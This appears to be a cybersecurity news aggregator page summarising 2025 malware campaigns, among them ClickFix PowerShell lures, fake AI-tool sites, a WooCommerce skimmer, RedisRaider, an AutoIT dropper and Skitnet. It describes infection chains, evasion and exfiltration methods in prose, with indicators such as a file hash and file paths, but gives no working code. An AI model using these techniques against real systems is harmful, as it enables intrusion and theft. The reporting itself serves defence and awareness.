CyberSecurity news

FlagThis - #malware

Pierluigi Paganini@Security Affairs //
Cybercriminals are using a fake Bitdefender website to distribute the Venom RAT (Remote Access Trojan) and other malicious programs, tricking users into downloading what they believe is legitimate antivirus software. The spoofed domain, bitdefender-download[.]com, closely mimics the official Bitdefender site, making it difficult for unsuspecting users to distinguish between the real and fake versions. This campaign highlights the importance of verifying the legitimacy of software download sources to avoid becoming a victim of malware.

Researchers have found that clicking on the "Download for Windows" button on the fraudulent site initiates a file download from a Bitbucket repository that redirects to an Amazon S3 bucket. The downloaded ZIP archive, named "BitDefender.zip," contains an executable ("StoreInstaller.exe") which includes malware configurations associated with Venom RAT, as well as code related to the open-source post-exploitation framework SilentTrinity and StormKitty stealer. These tools work in concert to compromise user systems.

The Venom RAT allows attackers to harvest data and maintain persistent remote access to compromised systems. Additionally, the StormKitty malware steals passwords, including those for cryptocurrency wallets, while SilentTrinity ensures the attacker can remain hidden and maintain long-term control. DomainTools suspects the fake Bitdefender site was likely used in phishing attacks, given its overlap with internet infrastructure hosting other fake sites impersonating banks and IT services, further emphasizing the malicious intent behind this cloned website.

Recommended read:
References :
  • securityaffairs.com: Crooks use a fake antivirus site to spread Venom RAT and a mix of malware
  • The Hacker News: Cybercriminals Clone Antivirus Site to Spread Venom RAT and Steal Crypto Wallets
  • PCMag UK security: Don't Fall For It: Fake Bitdefender Site Will Infect Your PC With Malware
  • www.pcmag.com: Don't Fall For It: Fake Bitdefender Site Will Infect Your PC With Malware | PCMag

djohnson@CyberScoop //
Mandiant, in collaboration with Google Cloud, has uncovered a cybercriminal campaign exploiting public interest in AI video generation. A group tracked as UNC6032, believed to be based in Vietnam, is spreading malware through fake advertisements, websites, and social media posts that promise access to popular prompt-to-video AI tools like Luma AI, Canva Dream Lab, and Kling AI. These malicious campaigns are designed to trick users into downloading infostealers and backdoors, compromising their devices and data.

UNC6032 has successfully reached millions of users across various social media platforms, including Facebook and LinkedIn, with thousands of malicious ads. These advertisements lure victims to phishing pages disguised as legitimate AI video generators. When users click on the "Start Free Now" button, they are led through a bogus video generation interface. After watching a fake loading bar, the site delivers a ZIP file containing malware. Once executed, this malware backdoors the victim's device and steals sensitive information.

Compromised users have experienced the theft of login credentials, cookies, credit card data, and even Facebook information. Mandiant's research indicates that this scheme impacts a wide range of industries and geographic areas. Researchers caution users to be wary of advertisements promising free access to premium software and to verify the legitimacy of video sources before running any PowerShell scripts or downloading files from unknown URLs.

Recommended read:
References :
  • Threats | CyberScoop: Mandiant flags fake AI video generators laced with malware
  • PCMag UK security: Warning AI-Generated TikTok Videos Want to Trick You Into Installing Malware
  • Threats | CyberScoop: Mandiant flags fake AI video generators laced with malware
  • cloud.google.com: Google Mandiant Threat Defense investigates a UNC6032 campaign that exploits interest in AI tools. UNC6032 utilizes fake “AI video generator†websites to deliver malware leading to the deployment of Python-based infostealers and several backdoors.
  • Malwarebytes: Fake AI video generator tools lure in Facebook and LinkedIn users to deliver malware
  • hackread.com: Fake AI Video Tool Ads on Facebook, LinkedIn Spread Infostealers
  • www.techradar.com: Millions of users could fall for fake Facebook ad for a text-to-AI-video tool that is just malware
  • CyberInsider: Cybercriminals Use Fake AI Video Tools to Deliver Infostealers
  • The Hacker News: Reports on the use of fake installers for popular AI tools to spread ransomware and malware.

Puja Srivastava@Sucuri Blog //
Cybercriminals are increasingly employing sophisticated social engineering techniques to distribute malware, with a recent surge in attacks leveraging fake CAPTCHA prompts and AI-generated TikTok videos. These campaigns, collectively known as "ClickFix," manipulate users into executing malicious PowerShell commands, leading to system compromise and the installation of information-stealing malware. A notable example involves a fake Google Meet page hosted on compromised WordPress sites, which tricks visitors into copying and pasting a specific PowerShell command under the guise of fixing a "Microphone Permission Denied" error. Once executed, the command downloads a remote access trojan (RAT), granting attackers full control over the victim's system.

The ClickFix technique is also being amplified through AI-generated TikTok videos that promise free access to premium software like Windows, Microsoft Office, Spotify, and CapCut. These videos instruct users to run PowerShell scripts, which instead install Vidar and StealC malware, capable of stealing login credentials, credit card data, and 2FA codes. Trend Micro researchers note that the use of AI allows for rapid production and tailoring of these videos to target different user segments. These tactics have proven highly effective, with one video promising to "boost your Spotify experience instantly" amassing nearly 500,000 views.

Detecting and preventing ClickFix attacks requires a multi-faceted approach. Security experts recommend disabling the Windows Run program via Group Policy Objects (GPOs) or turning off the "Windows + R" hotkey. Additionally, users should exercise caution when encountering unsolicited technical instructions, verify the legitimacy of video sources, and avoid running PowerShell commands from untrusted sources. Monitoring for keywords like "not a robot," "captcha," "secure code," and "human" in process creation events can also help identify potential attacks. These measures, combined with public awareness, are crucial in mitigating the growing threat posed by ClickFix campaigns.

Recommended read:
References :
  • Sucuri Blog: Fake Google Meet Page Tricks Users into Running PowerShell Malware
  • securityonline.info: Fake Google Meet Page Tricks Users into Running Malware
  • gbhackers.com: How Google Meet Pages Are Exploited to Deliver PowerShell Malware
  • securityaffairs.com: Crooks use TikTok videos with fake tips to trick users into running commands that install Vidar and StealC malware in ClickFix attacks.
  • securityonline.info: Threat actors have ramped up a new social engineering campaign, dubbed “ClickFix,†where fake CAPTCHA prompts embedded in
  • Know Your Adversary: I think you at least heard about fake CAPTCHA attacks. Yes, ClickFix again. The thing is - adversaries use fake CAPTCHA pages to trick users into executing malicious commands in Windows.

info@thehackernews.com (The@The Hacker News //
A concerning trend has emerged on TikTok where cybercriminals are exploiting the platform's widespread reach through AI-generated videos to distribute malware. These deceptive videos lure users into executing malicious PowerShell commands under the guise of providing instructions for software activation or unlocking premium features for applications like Windows, Microsoft Office, Spotify, and CapCut. Trend Micro researchers discovered that these videos, often featuring AI-generated voices and visuals, instruct viewers to run specific commands that ultimately download and install information-stealing malware such as Vidar and StealC.

One notable example highlighted by researchers involves a TikTok video claiming to offer instant Spotify enhancements, which amassed nearly half a million views along with a significant number of likes and comments. However, instead of delivering the promised benefits, the command provided in the video downloads a remote script that installs Vidar or StealC malware, executing it as a hidden process with elevated system privileges. These infostealers are designed to harvest sensitive information, including credentials, browser sessions, and cryptocurrency wallets, posing a substantial risk to unsuspecting users who fall victim to this social-engineering attack.

Security experts warn that these attacks are leveraging the "ClickFix" technique and using AI to generate convincing "how-to" videos. By exploiting the trust users place in video tutorials and the desire for free software or features, cybercriminals are effectively tricking individuals into infecting their own systems. Once active, the malware connects to command-and-control (C&C) servers to exfiltrate stolen data. Vidar employs stealthy tactics, utilizing platforms like Steam and Telegram as Dead Drop Resolvers to hide C&C details, while StealC uses direct IP connections. Users are urged to exercise caution and verify the legitimacy of instructions before running any commands provided in online videos.

Recommended read:
References :
  • CyberInsider: AI-Generated Videos on TikTok Push Vidar and StealC Infostealers
  • Virus Bulletin: Trend Micro researcher Junestherry Dela Cruz describes a TikTok campaign that uses possibly AI-generated videos to lure victims into executing PowerShell commands that lead to Vidar and StealC information stealers.
  • BleepingComputer: TikTok videos now push infostealer malware in ClickFix attacks
  • Help Net Security: TikTok videos + ClickFix tactic = Malware infection
  • bsky.app: Cybercriminals are using TikTok videos to trick users into infecting themselves with Vidar and StealC information-stealing malware in ClickFix attacks.
  • The Hacker News: The malware known as Latrodectus has become the latest to embrace the widely-used social engineering technique called ClickFix as a distribution vector.
  • securityonline.info: Trend Micro reveals a growing threat on TikTok, where AI-generated videos deceive users into running malicious PowerShell commands
  • Thomas Fox-Brewster: Forbes discusses AI TikTok Videos Promising Free Spotify And Windows Subscriptions Trick Users Into Installing Malware Instead.
  • bsky.app: Cybercriminals are using TikTok videos to trick users into infecting themselves with Vidar and StealC information-stealing malware in ClickFix attacks.
  • www.scworld.com: Infostealer deployed via TikTok videos
  • bsky.app: Cybercriminals are using TikTok videos to trick users into infecting themselves with Vidar and StealC information-stealing malware in ClickFix attacks.
  • TARNKAPPE.INFO: ClickFix-Malware über TikTok: Mit viralen TikTok-Videos als Trojanischem Pferd starten Cyberkriminelle neue Angriffswellen.
  • bsky.app: BleepingComputer reports Cybercriminals are using TikTok videos to trick users into infecting themselves with Vidar and StealC information-stealing malware in ClickFix attacks.
  • www.sentinelone.com: SentinelOne's Mary Braden Murphy shows how ClickFix is weaponizing verification fatigue to deliver RATs & infostealers. Tricking victims into infecting themselves in this manner has proven highly effective, with threat actors increasingly folding this technique into their playbook.
  • The DefendOps Diaries: Unmasking ClickFix: The New Cyber Threat on TikTok
  • securityaffairs.com: Fake software activation videos on TikTok spread Vidar, StealC.
  • The Hacker News: Hackers Use TikTok Videos to Distribute Vidar and StealC Malware via ClickFix Technique
  • ciso2ciso.com: Fake software activation videos on TikTok spread Vidar, StealC – Source: securityaffairs.com
  • www.techradar.com: Cybercriminals are using AI to generate convincing "how-to" videos.
  • PCMag UK security: Warning: AI-Generated TikTok Videos Want to Trick You Into Installing Malware
  • Threats | CyberScoop: Mandiant flags fake AI video generators laced with malware
  • Threats | CyberScoop: Mandiant flags fake AI video generators laced with malware
  • Virus Bulletin: Google Mandiant Threat Defense investigates a UNC6032 campaign that exploits interest in AI tools. UNC6032 utilizes fake “AI video generator†websites to deliver malware leading to the deployment of Python-based infostealers and several backdoors.
  • cloud.google.com: Google Mandiant Threat Defense investigates a UNC6032 campaign that exploits interest in AI tools. UNC6032 utilizes fake “AI video generator†websites to deliver malware leading to the deployment of Python-based infostealers and several backdoors.
  • hackread.com: Mandiant Threat Defense uncovers a campaign where Vietnam-based group UNC6032 tricks users with malicious social media ads for…
  • Malwarebytes: Cybercriminals are using text-to-video-AI tools to lure victims to fake websites that deliver malware like infostealers and Trojans.

@cyberinsider.com //
Cybersecurity researchers have uncovered a sophisticated malware campaign distributing the Winos 4.0 framework through trojanized installers of popular applications such as LetsVPN and QQBrowser. The campaign, active since February 2025, primarily targets Chinese-speaking environments and showcases careful, long-term planning by a capable threat actor. The attackers use fake software installers to trick users into installing the malware, which grants remote access to compromised systems.

The Winos 4.0 malware is delivered using a multi-layered infection chain called the Catena loader. This loader employs multi-stage reflective loaders and in-memory payload delivery techniques to evade traditional antivirus tools. The infection process begins with seemingly legitimate NSIS installers bundled with signed decoy applications and malicious components like shellcode embedded in ".ini" files and reflective DLLs. This modular approach allows the attackers to adapt quickly to detection pressures, as observed in the evolution of tactics from February to April 2025.

Once installed, Winos 4.0 connects to attacker-controlled servers, predominantly hosted in Hong Kong, to receive follow-up instructions or additional malware. The malware framework, built atop the foundations of Gh0st RAT, is written in C++ and utilizes a plugin-based system to harvest data, provide remote shell access, and launch distributed denial-of-service (DDoS) attacks. This campaign highlights the ongoing risk posed by trojanized software and emphasizes the importance of verifying software sources to prevent malware infections.

Recommended read:
References :

@securityonline.info //
A new and stealthy formjacking malware has been discovered targeting WooCommerce, the popular e-commerce plugin for WordPress. The malware discreetly steals customer payment data from legitimate checkout processes, posing a significant threat to online businesses. Unlike traditional skimmers that simply overlay payment forms, this malware integrates seamlessly into the checkout process, exfiltrating sensitive customer data without raising immediate suspicion.

This sophisticated malware injects a fake payment form into legitimate checkout pages, meticulously mimicking the design and functionality of the actual site. It captures card numbers, expiration dates, CVVs, and personal information like names and addresses. To evade detection, the malware uses the browser's localStorage to silently collect and store cardholder data, ensuring persistence and anti-forensic capabilities. The data theft is triggered when the "Place Order" button is pressed, using the navigator.sendBeacon() method to transmit data asynchronously and silently to a remote Command & Control (C2) server.

The infection vector is believed to be through compromised WordPress admin accounts. Attackers inject malicious JavaScript code via plugins like Simple Custom CSS and JS, exploiting their capabilities to insert code dynamically. This allows the malware to monitor user input on checkout fields continuously, capturing data even if the purchase isn't completed. Cybersecurity experts recommend implementing robust security measures, including regular security audits, up-to-date software, and careful monitoring of third-party dependencies, to protect against such attacks.

Recommended read:
References :
  • securityonline.info: Stealthy Skimmer: New Formjacking Malware Targets WooCommerce Checkouts
  • cyberpress.org: Formjacking Malware Emerges Targeting E-Commerce Sites for Credit Card Data
  • gbhackers.com: New Formjacking Malware Targets E-Commerce Sites to Steal Credit Card Data

Waqas@hackread.com //
A massive data breach has exposed over 184 million passwords and login credentials from various online platforms, including major players like Google, Microsoft, Facebook, and Apple. The unprotected database, containing 184,162,718 records, was discovered by security researcher Jeremiah Fowler. The exposed data includes logins for accounts connected to multiple governments, highlighting the severity of the potential impact.

The exposed Elastic database, which was over 47 GB in size, contained a plain text file with millions of sensitive pieces of data, lacking encryption, password protection, or any security measures. Fowler noted the unusual nature of the discovery, as the database didn't offer any clues about its owner or the source of the collected data. The unsecured nature of the database highlights the risks associated with recklessly compiling sensitive information in a single, vulnerable repository.

The incident underscores the importance of robust data security practices and the potential consequences of misconfigured or unsecured databases. The exposure of millions of plaintext passwords and login credentials raises significant concerns about potential misuse and unauthorized access to personal accounts. The discovery serves as a stark reminder of the need for organizations to prioritize data protection and implement strong security measures to safeguard sensitive user information.

Recommended read:
References :
  • hackread.com: Database Leak Reveals 184 Million Infostealer-Harvested Emails and Passwords
  • PCMag UK security: Security Nightmare: Researcher Finds Trove of 184M Exposed Logins for Google, Apple, More
  • WIRED: Mysterious Database of 184 Million Records Exposes Vast Array of Login Credentials
  • www.zdnet.com: Massive data breach exposes 184 million passwords for Google, Microsoft, Facebook, and more
  • Davey Winder: 184,162,718 Passwords And Logins Leaked — Apple, Facebook, Snapchat
  • DataBreaches.Net: Mysterious database of 184 million records exposes vast array of login credentials
  • 9to5Mac: Apple logins with plain text passwords found in massive database of 184M records
  • www.engadget.com: Someone Found Over 180 Million User Records in an Unprotected Online Database
  • borncity.com: Suspected InfoStealer data leak exposes 184 million login data
  • databreaches.net: The possibility that data could be inadvertently exposed in a misconfigured or otherwise unsecured database is a longtime privacy nightmare that has been difficult to fully address.
  • borncity.com: [German]Security researcher Jeremiah Fowler came across a freely accessible and unprotected database on the Internet. The find was quite something, as a look at the data sets suggests that it was probably data collected by InfoStealer malware. Records containing 184 …
  • securityonline.info: 184 Million Leaked Credentials Found in Open Database
  • Know Your Adversary: 184 Million Records Database Leak: Microsoft, Apple, Google, Facebook, PayPal Logins Found
  • securityonline.info: Security researchers have identified a database containing a staggering 184 million account credentials—prompting yet another urgent reminder to The post appeared first on .

@cyberscoop.com //
A federal grand jury indictment unsealed today has charged 16 defendants who allegedly developed and deployed the DanaBot malware, a scheme that infected over 300,000 computers globally. The malware, controlled and deployed by a Russia-based cybercrime organization, facilitated fraud and ransomware attacks, causing at least $50 million in damage. Aleksandr Stepanov, 39, also known as “JimmBee,” and Artem Aleksandrovich Kalinkin, 34, also known as “Onix”, both of Novosibirsk, Russia are amongst those charged.

The DanaBot malware was distributed through spam email messages containing malicious attachments or hyperlinks. Once a computer was infected, it became part of a botnet, allowing operators to remotely control the compromised machines. The malware operated on a malware-as-a-service model, offering access to the botnet and support tools to clients for a fee. DanaBot had extensive capabilities, including stealing data, hijacking banking sessions, recording keystrokes, and providing full remote access to victim computers.

In addition to the criminal charges related to DanaBot, the U.S. Department of Justice announced the seizure of internet domains tied to the LummaC2 information-stealing malware operation, which has been actively targeting U.S. critical infrastructure. The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have issued a joint advisory warning of these campaigns, which involve the deployment of the LummaC2 infostealer to breach networks and siphon off sensitive data. Microsoft independently took down 2,300 internet domains also used by the LummaC2 actors.

Recommended read:
References :
  • DataBreaches.Net: 16 Defendants Federally Charged in Connection with DanaBot Malware Scheme That Infected Computers Worldwide
  • The Register - Security: Suspected creeps behind DanaBot malware that hit 300K+ computers revealed
  • WIRED: Feds Charge 16 Russians Allegedly Tied to Botnets Used in Ransomware, Cyberattacks, and Spying
  • Threats | CyberScoop: DanaBot malware operation seized in global takedown
  • krebsonsecurity.com: Oops: DanaBot Malware Devs Infected Their Own PCs
  • Risky Business Media: Risky Bulletin: DanaBot and Lumma Stealer taken down
  • borncity.com: Operations Endgame, DanaBot-Net and Raptor disrupt infrastructure for ransomware attacks and more
  • hackread.com: Operation Endgame Takes Down DanaBot Malware, Neutralizes 300 Servers
  • The Hacker News: U.S. Dismantles DanaBot Malware Network, Charges 16 in $50M Global Cybercrime Operation

@securityonline.info //
SK Telecom, South Korea's largest mobile network operator, revealed a significant data breach in April 2025 that exposed the USIM data of 27 million subscribers. The company first detected malware on its networks on April 19, 2025, and responded by isolating the compromised servers. Investigations have since revealed the breach began as far back as June 15, 2022, with attackers deploying a web shell on one of SK Telecom's servers. This initial compromise provided a foothold in the network allowing them to execute commands and deploy additional malware payloads across multiple servers.

The attackers were able to steal a wide array of sensitive information, including users’ IMSI numbers, USIM authentication keys, network usage data, text messages, and contacts stored on SIM cards. A joint investigative committee comprising the South Korean government and SK Telecom discovered 25 separate backdoor programs on the company’s servers. Due to the undetected nature of the breach for nearly three years, the intruders were able to implant backdoors tailored to different malicious functions. SK Telecom only began logging server activity on December 31, 2024, creating a data void between June 15, 2022, and December 31, 2024, making it difficult to ascertain what data was exfiltrated or what malicious operations were executed during that time.

The breach has affected an estimated 26.95 million SK Telecom users, prompting the company to take immediate action. SK Telecom has suspended the onboarding of new customers and announced it will begin notifying all affected individuals to replace their SIM cards and adopt enhanced security measures. To mitigate the risks associated with SIM-swapping attacks, SK Telecom announced it would issue replacement SIM cards to all affected customers, while also implementing stricter safeguards to prevent unauthorized number transfers. The company also confirmed that USIM records for its entire subscriber base of 29 million people were exposed.

Recommended read:
References :

@research.checkpoint.com //
A sophisticated cyberattack campaign is exploiting the popularity of the generative AI service Kling AI to distribute malware through fake Facebook ads. Check Point Research uncovered the campaign, which began in early 2025. The attackers created convincing spoof websites mimicking Kling AI's interface, luring users with the promise of AI-generated content. These deceptive sites, promoted via at least 70 sponsored posts on fake Facebook pages, ultimately trick users into downloading malicious files.

Instead of delivering the promised AI-generated images or videos, the spoofed websites serve a Trojan horse. This comes in the form of a ZIP archive containing a deceptively named .exe file, designed to appear as a .jpg or .mp4 file through filename masquerading using Hangul Filler characters. When executed, this file installs a loader with anti-analysis features that disables security tools and establishes persistence on the victim's system. This initial loader is followed by a second-stage payload, which is the PureHVNC remote access trojan (RAT).

The PureHVNC RAT grants attackers remote control over the compromised system and steals sensitive data. It specifically targets browser-stored credentials and session tokens, with a focus on Chromium-based browsers and cryptocurrency wallet extensions like MetaMask and TronLink. Additionally, the RAT uses a plugin to capture screenshots when banking apps or crypto wallets are detected in the foreground. Check Point Research believes that Vietnamese threat actors are likely behind the campaign, as they have historically employed similar Facebook malvertising techniques to distribute stealer malware, capitalizing on the popularity of generative AI tools.

Recommended read:
References :
  • hackread.com: Scammers Use Fake Kling AI Ads to Spread Malware
  • Check Point Blog: Exploiting the AI Boom: How Threat Actors Are Targeting Trust in Generative Platforms like Kling AI
  • gbhackers.com: Malicious Hackers Create Fake AI Tool to Exploit Millions of Users
  • securityonline.info: AI Scam Alert: Fake Kling AI Sites Deploy Infostealer, Hide Executables
  • The Hacker News: Fake Kling AI Facebook ads deliver RAT malware to over 22 million potential victims.
  • blog.checkpoint.com: Exploiting the AI Boom: How Threat Actors Are Targeting Trust in Generative Platforms like Kling AI
  • Virus Bulletin: Check Point's Jaromír HoÅ™ejší analyses a Facebook malvertising campaign that directs the user to a convincing spoof of Kling AI’s websitem
  • securityonline.info: AI Scam Alert: Fake Kling AI Sites Deploy Infostealer, Hide Executables
  • Check Point Research: The Sting of Fake Kling: Facebook Malvertising Lures Victims to Fake AI Generation Website
  • Security Risk Advisors: 🚩 Facebook Malvertising Campaign Impersonates Kling AI to Deliver PureHVNC Stealer via Disguised Executables

Aminu Abdullahi@eSecurity Planet //
Cybersecurity researchers are raising alarms about a new, sophisticated cryptojacking campaign called RedisRaider, which targets publicly accessible Redis servers running on Linux. Discovered by Datadog Security Labs, RedisRaider employs an aggressive and technically complex attack chain to deploy Monero miners on compromised systems. The malware uses a custom-built scanner to identify vulnerable Redis servers across the internet, exploiting weak configurations to execute malicious cron jobs that download and run the primary payload.

The attackers behind RedisRaider have implemented advanced techniques to evade detection and analysis. The malware is written in Go and heavily obfuscated using a tool called Garble, hiding key functions within the code. Additionally, RedisRaider employs anti-forensic measures such as short key time-to-live (TTL) settings to erase traces, writing temporary files to cron directories to blend with system processes, and deleting keys and logs after execution to cover its tracks. These tactics make it challenging for security professionals to detect and analyze the malicious activity.

Datadog's investigation uncovered that the same infrastructure used for the server-level attacks also hosted a web-based Monero miner, indicating a multi-pronged revenue generation strategy. The attackers generate income not only from hijacked Linux servers but also from unsuspecting website visitors. Experts emphasize the need for proper configuration and security measures for publicly accessible Redis servers, including strong authentication and access controls, to prevent RedisRaider and similar cryptojacking campaigns from compromising systems and stealing resources.

Recommended read:
References :
  • cyberpress.org: A newly discovered cryptojacking campaign, dubbed RedisRaider, is targeting publicly accessible Redis servers on Linux systems with an aggressive and technically complex attack chain.
  • thehackernews.com: Cybersecurity researchers are calling attention to a new Linux cryptojacking campaign that's targeting publicly accessible Redis servers.
  • eSecurity Planet: New Go-Based Malware ‘RedisRaider’ Exploits Redis Servers to Mine Cryptocurrency
  • Cyber Security News: New RedisRaider Campaign Attacking Linux Servers by Abusing Redis Configuration
  • gbhackers.com: Datadog Security Research has uncovered a formidable new cryptojacking campaign dubbed “RedisRaider,” specifically targeting Linux servers with publicly accessible Redis instances.
  • www.esecurityplanet.com: New Go-Based Malware ‘RedisRaider’ Exploits Redis Servers to Mine Cryptocurrency

@gbhackers.com //
References: cyberpress.org , isc.sans.edu ,
Cybersecurity researchers have recently uncovered a sophisticated malware campaign targeting Windows systems through the exploitation of AutoIT scripts. AutoIT, a scripting language initially designed for Windows automation, has become a popular tool in the malware ecosystem due to its simplicity and ability to interact with various Windows components. This particular campaign stands out for its use of a double layer of AutoIT code and intricate obfuscation techniques, allowing it to evade detection and maintain persistence on infected machines.

The attack begins with a compiled AutoIT executable file named "1. Project & Profit.exe" (SHA256: b5fbae9376db12a3fcbc99e83ccad97c87fb9e23370152d1452768a3676f5aeb). Upon execution, this file downloads an AutoIT interpreter, saving it as "C:\Users\Public\Guard.exe," along with another AutoIT script, stored as "Secure.au3," and a PowerShell script named "PublicProfile.ps1." The "PublicProfile.ps1" script is immediately generated and executed, facilitating further stages of the infection. Persistence is achieved by creating a .url shortcut in the Windows Startup directory, ensuring that a JavaScript file is triggered upon each user login. This JavaScript file then re-executes the AutoIT interpreter with a second-stage script, keeping the malicious processes active.

The second layer of AutoIT code, referred to as script "G," employs heavy obfuscation to hinder analysis. All strings within this script are encoded using a custom function called "Wales," which transforms ASCII values into a readable format only after decoding. An example of this obfuscation is the encoded sequence "80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]116]117]105]46]101]120]101]39]41," which, when decoded, reveals "ProcessExists('avastui.exe')." This suggests the malware checks for antivirus processes to potentially avoid detection or alter its behavior. The attack culminates in the execution of a malicious DLL named "Urshqbgpm.dll" by injecting it into a "jsc.exe" process.

Recommended read:
References :
  • cyberpress.org: Hackers Use AutoIT Scripts to Spread Malware on Windows Systems
  • isc.sans.edu: RAT Dropped By Two Layers of AutoIT Code, (Mon, May 19th)
  • gbhackers.com: Hackers Exploit AutoIT Scripts to Deploy Malware Targeting Windows Systems

Mandvi@Cyber Security News //
Skitnet, also known as Bossnet, is a multi-stage malware that has emerged as a favored tool for ransomware gangs, offering stealth and versatility in cybercrime. First advertised on underground forums like RAMP in April 2024, it has quickly gained traction among notorious groups such as BlackBasta. These groups have leveraged Skitnet's capabilities in phishing attacks targeting enterprise platforms like Microsoft Teams. The malware is attributed to threat actor LARVA-306.

Skitnet employs advanced techniques for stealthy payload delivery and persistent system compromise. Its initial executable, written in Rust, decrypts an embedded payload compiled in Nim. The Nim binary then establishes a reverse shell connection with the command-and-control (C2) server via DNS resolution, evading detection by dynamically resolving API function addresses. This method avoids traditional import tables, enhancing its stealth capabilities. The malware initiates the session with randomized DNS queries, creating a robust and stealthy communication channel.

To maintain persistence, Skitnet utilizes sophisticated mechanisms such as DLL hijacking. It leverages a legitimate, signed executable from Asus (ISP.exe) placed alongside a malicious library (SnxHidLib.DLL). This malicious DLL triggers the execution of a PowerShell script (pas.ps1), which operates in an infinite loop to relay the device’s C drive serial number to the C2 server, continuously awaiting commands. Skitnet also features commands for data exfiltration and can even download a .NET loader binary for serving additional payloads, showcasing its versatility as a post-exploitation tool.

Recommended read:
References :
  • bsky.app: Ransomware gangs increasingly use Skitnet post-exploitation malware ift.tt/cCJbfqk
  • Cyber Security News: Skitnet Malware Uses Advanced Stealth Methods to Deliver Payload and Ensure Persistence Techniques
  • The DefendOps Diaries: Explore Skitnet, a powerful ransomware tool reshaping cybercrime with its stealth and versatility, used by notorious gangs like BlackBasta.
  • The Hacker News: Ransomware Gangs Use Skitnet Malware for Stealthy Data Theft and Remote Access